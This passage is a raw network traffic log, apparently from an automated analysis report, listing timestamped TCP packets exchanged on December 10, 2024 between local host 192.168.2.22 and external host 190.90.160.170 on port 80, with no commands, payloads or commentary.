                          Dec 10, 2024 14:20:53.968997002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.969137907 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.969727993 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.969845057 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.970820904 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.970901012 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.971652985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.971739054 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.972681046 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.972693920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.972740889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.972740889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.974541903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.974608898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.974611998 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.974667072 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.976701975 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.976720095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.976778984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.978389025 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.978425980 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.978425980 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.978452921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.978523970 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.979947090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.979993105 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.980021954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.980073929 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.982028961 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.982040882 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.982089996 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.983350039 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.983362913 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.983396053 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.983426094 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.985038042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.985086918 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.985115051 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.985196114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.987142086 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.987163067 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.987230062 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.988652945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.988725901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.988728046 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.988773108 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.990418911 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.990432978 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.990468025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.990500927 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.992207050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.992230892 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.992269039 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.992269039 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.993992090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.994051933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.994074106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.994122982 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.995843887 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.995932102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.996035099 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.996128082 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.997941017 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.997987032 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.998635054 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.998652935 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:53.998682022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:53.998699903 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.000262976 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.000349998 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.000509024 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.000554085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.001998901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.002012014 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.002044916 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.003787041 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.003814936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.003861904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.003979921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.004040003 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.005537033 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.005551100 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.005599022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.006967068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.007013083 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.007021904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.007076025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.008411884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.008429050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.008485079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.009898901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.009973049 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.010015965 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.010076046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.011419058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.011478901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.011848927 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.011894941 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.012958050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.013025999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.013665915 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.013710976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.014427900 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.014480114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.014904976 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.014955044 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.016000986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.016050100 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.016132116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.016184092 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.017587900 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.017605066 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.017644882 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.019102097 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.019150972 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.019180059 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.019231081 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.020628929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.020641088 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.020678043 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.022093058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.022165060 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.022891998 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.022942066 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.023833036 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.023844957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.023894072 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.025284052 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.025295973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.025338888 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.025367022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.026698112 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.026750088 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.026753902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.026793957 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.028263092 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.028315067 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.028331041 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.028374910 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.071847916 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.071962118 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.072185993 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.072283030 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.072588921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.072649956 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.073067904 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.073113918 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.074125051 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.074186087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.074836016 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.074884892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.077578068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.077630043 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.077816963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.077887058 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.078473091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.078567982 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.143867970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.143965960 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.144061089 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.144145012 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.144361019 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.144494057 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.144620895 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.144668102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.144721031 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.144768953 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.145653009 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.145705938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.145879984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.145978928 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.146699905 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.146761894 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.146768093 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.146817923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.147754908 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.147825956 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.147826910 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.147867918 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.148817062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.148888111 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.149398088 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.149476051 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.149874926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.149924994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.149924994 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.149976015 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.150855064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.150954962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.151118994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.151180029 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.152048111 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.152070045 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.152112007 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.152112007 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.152899981 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.152960062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.152965069 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.153008938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.153920889 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.153983116 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.154017925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.154100895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.154925108 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.154977083 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.155147076 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.155213118 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.156069994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.156081915 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.156135082 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.157000065 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.157058954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.157167912 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.157217979 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.158077002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.158091068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.158134937 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.158982038 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.158997059 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.159061909 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.160012960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.160024881 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.160073996 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.160978079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.161035061 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.161381006 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.161448956 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.162179947 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.162241936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.162467957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.162548065 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.163047075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.163108110 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.163280964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.163341045 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.164088011 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.164100885 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.164182901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.165080070 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.165153980 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.165201902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.165307999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.166260004 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.166270971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.166307926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.166307926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.167243004 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.167254925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.167299986 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.168457985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.168472052 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.168505907 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.169735909 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.169779062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.169789076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.169825077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.170325041 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.170336962 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.170378923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.170398951 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.171173096 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.171184063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.171251059 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.172323942 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.172380924 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.172544956 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.172602892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.173175097 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.173237085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.173414946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.173464060 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.174210072 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.174222946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.174288034 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.175183058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.175234079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.175259113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.175273895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.176373005 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.176386118 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.176512003 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.177282095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.177354097 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.177462101 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.177525997 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.178348064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.178359985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.178427935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.179459095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.179471970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.179521084 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.180427074 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.180440903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.180573940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.181880951 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.181894064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.181960106 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.182332039 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.182394981 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.182566881 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.182672977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.183307886 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.183326960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.183372974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.183372974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.184339046 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.184401035 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.184406042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.184493065 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.185338020 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.185429096 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.185806036 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.185877085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.186743021 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.186755896 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.186801910 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.187392950 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.187443972 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.187666893 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.187758923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.188393116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.188477993 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.188611984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.188676119 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.189398050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.189491987 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.189563036 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.189623117 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.190432072 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.190511942 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.190613985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.190661907 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.191442013 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.191490889 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.191514015 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.191530943 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.192467928 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.192517996 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.192552090 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.192600012 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.193481922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.193537951 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.194070101 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.194120884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.194493055 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.194506884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.194550991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.194550991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.195342064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.195399046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.196281910 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.196363926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.196367025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.196377993 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.196405888 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.196417093 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.336429119 CET8049165190.90.160.170192.168.2.22
